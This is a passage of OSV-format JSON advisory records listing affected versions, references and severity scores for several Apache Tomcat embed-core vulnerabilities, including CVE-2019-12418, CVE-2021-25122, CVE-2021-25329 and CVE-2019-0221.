"11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.10", "11.0.11", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-hgrr-935x-pq79/GHSA-hgrr-935x-pq79.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.47" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", 
"10.1.4", "10.1.40", "10.1.41", "10.1.42", "10.1.43", "10.1.44", "10.1.45", "10.1.46", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-hgrr-935x-pq79/GHSA-hgrr-935x-pq79.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.40" }, { "fixed": "9.0.110" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.106", "9.0.107", "9.0.108", "9.0.109", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-hgrr-935x-pq79/GHSA-hgrr-935x-pq79.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.60" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.100", "8.5.60", "8.5.61", "8.5.63", "8.5.64", 
"8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-hgrr-935x-pq79/GHSA-hgrr-935x-pq79.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61795" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/1cdf5f730ede75a0759492f179ac21ca4ff68e06" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/af6e9181620304c0d818121c29c074e1330610d0" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/afa422bd7ca1eef0f507259c682fd876494d9c3b" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/wm9mx8brmx9g4zpywm06ryrtvd3160pp" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html#Fixed_in_Apache_Tomcat_10.1.47" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html#Fixed_in_Apache_Tomcat_11.0.12" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.110" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/10/27/6" } ], "database_specific": { "cwe_ids": [ "CWE-404" ], "github_reviewed": true, "github_reviewed_at": "2025-10-28T18:02:45Z", "nvd_published_at": "2025-10-27T18:15:44Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U" } ] }, { "schema_version": "1.7.3", "id": "GHSA-hh3j-x4mc-g48r", "published": "2019-12-26T18:22:36Z", "modified": "2024-03-14T05:19:45.437799Z", "aliases": [ "CVE-2019-12418" ], "related": [ "CGA-8w25-pmjp-vrmj" ], 
"summary": "Insufficiently Protected Credentials in Apache Tomcat", "details": "When Apache Tomcat 9.0.0.M1 to 9.0.28, 8.5.0 to 8.5.47, 7.0.0 and 7.0.97 is configured with the JMX Remote Lifecycle Listener, a local attacker without access to the Tomcat process or configuration files is able to manipulate the RMI registry to perform a man-in-the-middle attack to capture user names and passwords used to access the JMX interface. The attacker can then use these credentials to access the JMX interface and gain complete control over the Tomcat instance.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "7.0.99" } ] } ], "versions": [ "7.0.0", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.8", "7.0.81", "7.0.82", "7.0.84", "7.0.85", "7.0.86", "7.0.88", "7.0.90", "7.0.91", "7.0.92", "7.0.93", "7.0.94", "7.0.96" ], "database_specific": { "last_known_affected_version_range": "\u003c 7.0.98", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/12/GHSA-hh3j-x4mc-g48r/GHSA-hh3j-x4mc-g48r.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.5.49" } ] } ], 
"versions": [ "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.47", "8.0.48", "8.0.49", "8.0.5", "8.0.50", "8.0.51", "8.0.52", "8.0.53", "8.0.8", "8.0.9", "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "last_known_affected_version_range": "\u003c 8.5.48", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/12/GHSA-hh3j-x4mc-g48r/GHSA-hh3j-x4mc-g48r.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.29" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.4", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/12/GHSA-hh3j-x4mc-g48r/GHSA-hh3j-x4mc-g48r.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12418" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2020/dsa-4680" }, { "type": "WEB", "url": 
"https://www.debian.org/security/2019/dsa-4596" }, { "type": "WEB", "url": "https://usn.ubuntu.com/4251-1" }, { "type": "WEB", "url": "https://support.f5.com/csp/article/K10107360?utm_source=f5support\u0026amp;utm_medium=RSS" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200107-0001" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202003-43" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Dec/43" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00029.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00024.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/43530b91506e2e0c11cfbe691173f5df8c48f51b98262426d7493b67%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00013.html" } ], "database_specific": { "cwe_ids": [ "CWE-522" ], "github_reviewed": true, "github_reviewed_at": "2019-12-26T18:22:10Z", "nvd_published_at": "2019-12-23T18:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": 
"GHSA-j39c-c8hj-x4j3", "published": "2021-06-16T17:45:29Z", "modified": "2024-02-19T05:31:44.331997Z", "aliases": [ "BIT-tomcat-2021-25122", "CVE-2021-25122" ], "related": [ "CGA-vhqv-jhjv-679r" ], "summary": "Exposure of Sensitive Information to an Unauthorized Actor in Apache Tomcat", "details": "When responding to new h2c connection requests, Apache Tomcat versions 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41 and 8.5.0 to 8.5.61 could duplicate request headers and a limited amount of request body from one request to another meaning user A and user B could both see the results of user A's request.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0" }, { "fixed": "10.0.2" } ] } ], "versions": [ "10.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-j39c-c8hj-x4j3/GHSA-j39c-c8hj-x4j3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.43" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-j39c-c8hj-x4j3/GHSA-j39c-c8hj-x4j3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" 
}, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.63" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-j39c-c8hj-x4j3/GHSA-j39c-c8hj-x4j3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-25122" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcd90bf36b1877e1310b87ecd14ed7bbb15da52b297efd9f0e7253a3b@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0463f9a5cbc02a485404c4b990f0da452e5ac5c237808edba11c947@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rf6d5d57b114678d8898005faef31e9fd6d7c981fcc4ccfc3bc272fc9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00018.html" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202208-34" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210409-0002" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4891" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/03/01/1" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2021-03-24T19:53:13Z", "nvd_published_at": "2021-03-01T12:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-jgwr-3qm3-26f3", "published": "2021-03-19T20:11:13Z", "modified": "2024-03-08T05:18:06.945365Z", "aliases": [ "BIT-tomcat-2021-25329", "CVE-2021-25329" ], "related": [ "CGA-457j-5q26-g4hx" ], "summary": "Potential remote code execution in Apache Tomcat", "details": "The fix for CVE-2020-9484 was incomplete. When using Apache Tomcat 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41, 8.5.0 to 8.5.61 or 7.0.0. to 7.0.107 with a configuration edge case that was highly unlikely to be used, the Tomcat instance was still vulnerable to CVE-2020-9494. 
Note that both the previously published prerequisites for CVE-2020-9484 and the previously published mitigations for CVE-2020-9484 also apply to this issue.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0-M1" }, { "fixed": "10.0.2" } ] } ], "versions": [ "10.0.0", "10.0.0-M1", "10.0.0-M10", "10.0.0-M3", "10.0.0-M4", "10.0.0-M5", "10.0.0-M6", "10.0.0-M7", "10.0.0-M8", "10.0.0-M9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-jgwr-3qm3-26f3/GHSA-jgwr-3qm3-26f3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.41" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-jgwr-3qm3-26f3/GHSA-jgwr-3qm3-26f3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.5.61" } ] } ], "versions": [ "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", 
"8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.47", "8.0.48", "8.0.49", "8.0.5", "8.0.50", "8.0.51", "8.0.52", "8.0.53", "8.0.8", "8.0.9", "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-jgwr-3qm3-26f3/GHSA-jgwr-3qm3-26f3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.108" } ] } ], "versions": [ "7.0.0", "7.0.100", "7.0.103", "7.0.104", "7.0.105", "7.0.106", "7.0.107", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.8", "7.0.81", "7.0.82", "7.0.84", "7.0.85", "7.0.86", "7.0.88", "7.0.90", "7.0.91", "7.0.92", "7.0.93", "7.0.94", "7.0.96", "7.0.99" ], "database_specific": { "last_known_affected_version_range": "\u003c 7.0.107", "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-jgwr-3qm3-26f3/GHSA-jgwr-3qm3-26f3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-25329" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/6d66e99ef85da93e4d2c2a536ca51aa3418bfaf4" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4891" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210409-0002" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202208-34" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00018.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf6d5d57b114678d8898005faef31e9fd6d7c981fcc4ccfc3bc272fc9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rb51ccd58b2152fc75125b2406fc93e04ca9d34e737263faa6ff0f41f@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8a2ac0e476dbfc1e6440b09dcc782d444ad635d6da26f0284725a5dc@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r732b2ca289dc02df2de820e8775559abd6c207f159e39f559547a085@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r11ce01e8a4c7269b88f88212f21830edf73558997ac7744f37769b77@%3Cusers.tomcat.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/03/01/2" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-03-19T20:10:56Z", "nvd_published_at": "2021-03-01T12:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-jjpq-gp5q-8q6w", "published": "2019-05-30T03:30:42Z", "modified": "2024-03-11T14:57:09.068862Z", "aliases": [ "CVE-2019-0221" ], "summary": "Cross-site scripting in Apache Tomcat", "details": "The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. 
The printenv command is intended for debugging and is unlikely to be present in a production website.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.17" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.2", "9.0.4", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/05/GHSA-jjpq-gp5q-8q6w/GHSA-jjpq-gp5q-8q6w.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.5.40" } ] } ], "versions": [ "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.47", "8.0.48", "8.0.49", "8.0.5", "8.0.50", "8.0.51", "8.0.52", "8.0.53", "8.0.8", "8.0.9", "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": 